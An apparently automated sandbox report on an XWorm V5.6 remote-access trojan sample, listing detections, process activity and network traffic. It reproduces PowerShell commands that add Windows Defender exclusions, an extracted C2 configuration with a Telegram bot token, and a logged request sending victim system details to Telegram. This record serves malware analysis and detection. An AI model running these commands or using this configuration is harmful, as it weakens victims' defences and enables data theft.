Windows Analysis Report
VJV2AjJ7Na.exe

Overview

General Information

Sample name:VJV2AjJ7Na.exe
renamed because original name is a hash value
Original sample name:a9f1d82a7954d86d746086969c0d7b7b5ca65ccfd0d6a375931a6826eca1a8c7.exe
Analysis ID:1483225
MD5:99088d7d8b409b4039b02295e64a686f
SHA1:f58dad3090854f8ab5cc3de89d6cdaeb151883d4
SHA256:a9f1d82a7954d86d746086969c0d7b7b5ca65ccfd0d6a375931a6826eca1a8c7
Tags:exe

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • VJV2AjJ7Na.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\VJV2AjJ7Na.exe" MD5: 99088D7D8B409B4039B02295E64A686F)
    • powershell.exe (PID: 1208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": ["main-although.gl.at.ply.gg"], "Port": "30970", "Aes key": "30970", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354"}
Source | Rule | Description | Author
VJV2AjJ7Na.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
VJV2AjJ7Na.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
VJV2AjJ7Na.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
VJV2AjJ7Na.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xce79:$s6: VirtualBox
  • 0xcdd7:$s8: Win32_ComputerSystem
  • 0xef86:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf023:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf138:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe873:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\XClient.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
C:\Users\user\AppData\Roaming\XClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\XClient.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Roaming\XClient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xce79:$s6: VirtualBox
  • 0xcdd7:$s8: Win32_ComputerSystem
  • 0xef86:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf023:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf138:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe873:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author
00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xcc79:$s6: VirtualBox
  • 0xcbd7:$s8: Win32_ComputerSystem
  • 0xed86:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xee23:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xef38:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe673:$cnc4: POST / HTTP/1.1
00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.3360702564.0000000002A00000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Process Memory Space: VJV2AjJ7Na.exe PID: 6496 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Source | Rule | Description | Author
0.0.VJV2AjJ7Na.exe.7f0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.VJV2AjJ7Na.exe.7f0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.VJV2AjJ7Na.exe.7f0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xce79:$s6: VirtualBox
  • 0xcdd7:$s8: Win32_ComputerSystem
  • 0xef86:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf023:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf138:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe873:$cnc4: POST / HTTP/1.1

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VJV2AjJ7Na.exe", ParentImage: C:\Users\user\Desktop\VJV2AjJ7Na.exe, ParentProcessId: 6496, ParentProcessName: VJV2AjJ7Na.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', ProcessId: 1208, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VJV2AjJ7Na.exe", ParentImage: C:\Users\user\Desktop\VJV2AjJ7Na.exe, ParentProcessId: 6496, ParentProcessName: VJV2AjJ7Na.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', ProcessId: 1208, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VJV2AjJ7Na.exe", ParentImage: C:\Users\user\Desktop\VJV2AjJ7Na.exe, ParentProcessId: 6496, ParentProcessName: VJV2AjJ7Na.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', ProcessId: 1208, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\VJV2AjJ7Na.exe, ProcessId: 6496, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VJV2AjJ7Na.exe", ParentImage: C:\Users\user\Desktop\VJV2AjJ7Na.exe, ParentProcessId: 6496, ParentProcessName: VJV2AjJ7Na.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe', ProcessId: 1208, ProcessName: powershell.exe
No Snort rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-26T21:23:22.379211+0200 | 2852870 | 30970 | 49720 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:22:55.160186+0200 | 2012510 | 443 | 49719 | TCP | Potentially Bad Traffic
2024-07-26T21:22:55.159601+0200 | 2853685 | 49719 | 443 | TCP | A Network Trojan was detected
2024-07-26T21:22:51.830728+0200 | 2022930 | 443 | 49718 | TCP | A Network Trojan was detected
2024-07-26T21:23:16.474992+0200 | 2852870 | 30970 | 49720 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:24:00.825159+0200 | 2852870 | 30970 | 49720 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:24:01.270266+0200 | 2852923 | 49720 | 30970 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:22:14.312906+0200 | 2022930 | 443 | 49713 | TCP | A Network Trojan was detected
2024-07-26T21:23:09.044405+0200 | 2852870 | 30970 | 49720 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:24:01.268441+0200 | 2852870 | 30970 | 49720 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:23:09.092721+0200 | 2852923 | 49720 | 30970 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:23:22.381102+0200 | 2852923 | 49720 | 30970 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:23:35.706366+0200 | 2852923 | 49720 | 30970 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:23:49.131894+0200 | 2852870 | 30970 | 49720 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:24:06.033582+0200 | 2852870 | 30970 | 49720 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:23:59.832923+0200 | 2852870 | 30970 | 49720 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:23:59.835128+0200 | 2852923 | 49720 | 30970 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:23:46.482216+0200 | 2852870 | 30970 | 49720 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:24:00.826655+0200 | 2852923 | 49720 | 30970 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:23:35.704548+0200 | 2852870 | 30970 | 49720 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:24:06.034293+0200 | 2852923 | 49720 | 30970 | TCP | Malware Command and Control Activity Detected
2024-07-26T21:23:49.134083+0200 | 2852923 | 49720 | 30970 | TCP | Malware Command and Control Activity Detected

AV Detection

Source: VJV2AjJ7Na.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\XClient.exe | Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: VJV2AjJ7Na.exe | Malware Configuration Extractor: Xworm {"C2 url": ["main-although.gl.at.ply.gg"], "Port": "30970", "Aes key": "30970", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354"}
Source: C:\Users\user\AppData\Roaming\XClient.exe | ReversingLabs: Detection: 78%
Source: VJV2AjJ7Na.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\XClient.exe | Joe Sandbox ML: detected
Source: VJV2AjJ7Na.exe | Joe Sandbox ML: detected
Source: VJV2AjJ7Na.exe | String decryptor: main-although.gl.at.ply.gg
Source: VJV2AjJ7Na.exe | String decryptor: 30970
Source: VJV2AjJ7Na.exe | String decryptor: <Xwormmm>
Source: VJV2AjJ7Na.exe | String decryptor: XWorm V5.6
Source: VJV2AjJ7Na.exe | String decryptor: USB.exe
Source: VJV2AjJ7Na.exe | String decryptor: %AppData%
Source: VJV2AjJ7Na.exe | String decryptor: XClient.exe
Source: VJV2AjJ7Na.exe | String decryptor: 7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs
Source: VJV2AjJ7Na.exe | String decryptor: 6131620354
Source: VJV2AjJ7Na.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: VJV2AjJ7Na.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Malware configuration extractor | URLs: main-although.gl.at.ply.gg
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: VJV2AjJ7Na.exe, type: SAMPLE
Source: Yara match | File source: 0.0.VJV2AjJ7Na.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.6:49720 -> 147.185.221.21:30970
Source: global traffic | HTTP traffic detected: GET /bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 147.185.221.21
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: main-although.gl.at.ply.gg
Source: powershell.exe, 00000005.00000002.2301226661.000002492CDBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000008.00000002.2435104153.000001DBE65E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000002.00000002.2206032792.0000025C2D061000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ml
Source: powershell.exe, 00000002.00000002.2177459096.0000025C12DFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000002.00000002.2177459096.0000025C12DFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.ctain
Source: VJV2AjJ7Na.exe, XClient.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000002.00000002.2199242127.0000025C24A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2285409152.00000249247C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2412961852.000001DBDDE53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2178194155.0000025C14C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.000002491497A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCE008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2178194155.0000025C149E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.0000024914751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCDDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A48511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2178194155.0000025C14C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.000002491497A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCE008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2301226661.000002492CDDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2178194155.0000025C149E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.0000024914751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCDDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A48511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: VJV2AjJ7Na.exe, XClient.exe.0.dr | String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.2645209881.0000025A60A70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5alC
Source: powershell.exe, 00000002.00000002.2199242127.0000025C24A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2285409152.00000249247C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2412961852.000001DBDDE53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49719 version: TLS 1.2

                          Operating System Destruction

Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process information set: 01 00 00 00

                          System Summary

Source: VJV2AjJ7Na.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.VJV2AjJ7Na.exe.7f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Code functions: 0_2_00007FFD34695CF6, 0_2_00007FFD346910FA, 0_2_00007FFD34696AA2, 0_2_00007FFD34691BB1, 0_2_00007FFD3469E0BC, 0_2_00007FFD346925D3, 0_2_00007FFD346926D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code functions: 2_2_00007FFD3469B9FA, 2_2_00007FFD34695EFA, 2_2_00007FFD3469BAFB, 2_2_00007FFD346956EA, 2_2_00007FFD3469201D, 2_2_00007FFD34693FFA, 2_2_00007FFD34695BFA, 2_2_00007FFD34696FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code functions: 5_2_00007FFD3469B953, 5_2_00007FFD34691FD5, 5_2_00007FFD34693FFA, 5_2_00007FFD34695BFA, 5_2_00007FFD347639D1, 5_2_00007FFD34762E11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code functions: 8_2_00007FFD3468356D, 8_2_00007FFD34685ED3, 8_2_00007FFD34685BF2, 8_2_00007FFD34753CA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code functions: 10_2_00007FFD346621FA, 10_2_00007FFD3466B9FA, 10_2_00007FFD34660E9D, 10_2_00007FFD346656EA, 10_2_00007FFD34660BAD, 10_2_00007FFD34665BFA, 10_2_00007FFD34666FFA, 10_2_00007FFD347330E9
Source: VJV2AjJ7Na.exe, 00000000.00000000.2103695293.0000000000804000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs VJV2AjJ7Na.exe
Source: VJV2AjJ7Na.exe | Binary or memory string: OriginalFilenameXClient.exe4 vs VJV2AjJ7Na.exe
Source: VJV2AjJ7Na.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: VJV2AjJ7Na.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
